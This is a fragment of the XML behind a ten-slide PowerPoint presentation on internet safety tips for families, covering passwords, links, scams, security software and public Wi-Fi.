              </a:rPr>
              <a:t>Use a good security solution is a guarantee of successful and secure Internet search</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Maven Pro Medium"/>
              <a:ea typeface="Maven Pro Medium"/>
              <a:cs typeface="Maven Pro Medium"/>
              <a:sym typeface="Maven Pro Medium"/>
            </a:endParaRPr>
          </a:p>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Экран (16:9)</PresentationFormat>
  <Paragraphs>59</Paragraphs>
  <Slides>10</Slides>
  <Notes>10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Maven Pro</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Nunito ExtraBold</vt:lpstr>
      <vt:lpstr>Maven Pro Medium</vt:lpstr>
      <vt:lpstr>Nunito</vt:lpstr>
      <vt:lpstr>Momentum</vt:lpstr>
      <vt:lpstr>Prepared by Zoreslav Usik</vt:lpstr>
      <vt:lpstr>Don’t share personal information</vt:lpstr>
      <vt:lpstr>Always be nice </vt:lpstr>
      <vt:lpstr>Your kids &amp; the Internet</vt:lpstr>
      <vt:lpstr>Keep an eye on mobiles and tablets </vt:lpstr>
      <vt:lpstr>Use secure passwords </vt:lpstr>
      <vt:lpstr>Be careful when opening links </vt:lpstr>
      <vt:lpstr>Learn to recognize scams</vt:lpstr>
      <vt:lpstr>Use a good security solution </vt:lpstr>
      <vt:lpstr>Be careful with public Wi - Fi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by Zoreslav Usik</dc:title>
  <cp:lastModifiedBy>Admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-08T19:34:09Z</dcterms:modified>
</cp:coreProperties>
</file>